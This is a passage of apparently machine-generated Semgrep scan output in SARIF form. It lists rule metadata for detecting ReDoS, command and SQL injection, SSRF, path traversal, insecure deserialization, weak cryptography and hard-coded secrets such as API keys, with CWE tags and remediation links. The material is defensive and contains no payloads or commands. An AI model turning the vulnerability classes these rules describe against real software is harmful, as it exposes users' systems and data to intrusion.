java.lang.security.audit.http-response-splitting.http-response-splitting"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. "},"help":{"markdown":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.regexp-redos.regexp-redos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://www.regular-expressions.info/catastrophic.html](https://www.regular-expressions.info/catastrophic.html)\n","text":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. "},"helpUri":"https://semgrep.dev/r/javascript.express.regexp-redos.regexp-redos","id":"javascript.express.regexp-redos.regexp-redos","name":"javascript.express.regexp-redos.regexp-redos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.regexp-redos.regexp-redos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"the `encoding` argument to Popen is only available on Python 3.6+"},"help":{"markdown":"the `encoding` argument to Popen is only available on Python 3.6+\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python36.python36-compatibility-Popen2)\n","text":"the `encoding` argument to Popen is only available on Python 3.6+"},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python36.python36-compatibility-Popen2","id":"python.lang.compatibility.python36.python36-compatibility-Popen2","name":"python.lang.compatibility.python36.python36-compatibility-Popen2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python36.python36-compatibility-Popen2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Snyk API Key detected"},"help":{"markdown":"Snyk API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Snyk API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","id":"generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","name":"generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"help":{"markdown":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion)\n - [https://cwe.mitre.org/data/definitions/704.html](https://cwe.mitre.org/data/definitions/704.html)\n","text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","id":"java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","name":"java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","id":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","name":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Database instance has no logging. Missing logs can cause missing important event information."},"help":{"markdown":"Database instance has no logging. Missing logs can cause missing important event information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Database instance has no logging. Missing logs can cause missing important event information."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","id":"terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","name":"terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","id":"python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","name":"python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM."},"help":{"markdown":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4)\n - [https://cwe.mitre.org/data/definitions/326.html](https://cwe.mitre.org/data/definitions/326.html)\n - [https://www.pycryptodome.org/src/cipher/cipher](https://www.pycryptodome.org/src/cipher/cipher)\n","text":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","id":"python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","name":"python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","id":"java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","name":"java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt."},"help":{"markdown":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","id":"swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","name":"swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.tainted-shelve.tainted-shelve)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.lang.file.tainted-shelve.tainted-shelve","id":"python.lang.file.tainted-shelve.tainted-shelve","name":"python.lang.file.tainted-shelve.tainted-shelve","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.tainted-shelve.tainted-shelve"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request)\n - [https://openjdk.java.net/groups/net/httpclient/intro.html](https://openjdk.java.net/groups/net/httpclient/intro.html)\n","text":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","id":"problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","name":"problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption."},"help":{"markdown":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.alloc-strlen.alloc-strlen)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator](https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator)\n","text":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.alloc-strlen.alloc-strlen","id":"cpp.lang.security.strings.alloc-strlen.alloc-strlen","name":"cpp.lang.security.strings.alloc-strlen.alloc-strlen","properties":{"precision":"very-high","tags":["CWE-131: Incorrect Calculation of Buffer Size","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.alloc-strlen.alloc-strlen"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.xpath.tainted-xpath.tainted-xpath)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"helpUri":"https://semgrep.dev/r/java.micronaut.xpath.tainted-xpath.tainted-xpath","id":"java.micronaut.xpath.tainted-xpath.tainted-xpath","name":"java.micronaut.xpath.tainted-xpath.tainted-xpath","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.xpath.tainted-xpath.tainted-xpath"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`."},"helpUri":"https://semgrep.dev/r/python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","id":"python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","name":"python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","id":"python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","name":"python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","id":"python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","name":"python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure"},"help":{"markdown":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.losformatter?view=netframework-4.8](https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.losformatter?view=netframework-4.8)\n","text":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","id":"csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","name":"csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unencrypted request over HTTP detected."},"help":{"markdown":"Unencrypted request over HTTP detected.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.security.react-insecure-request.react-insecure-request)\n - [https://www.npmjs.com/package/axios](https://www.npmjs.com/package/axios)\n","text":"Unencrypted request over HTTP 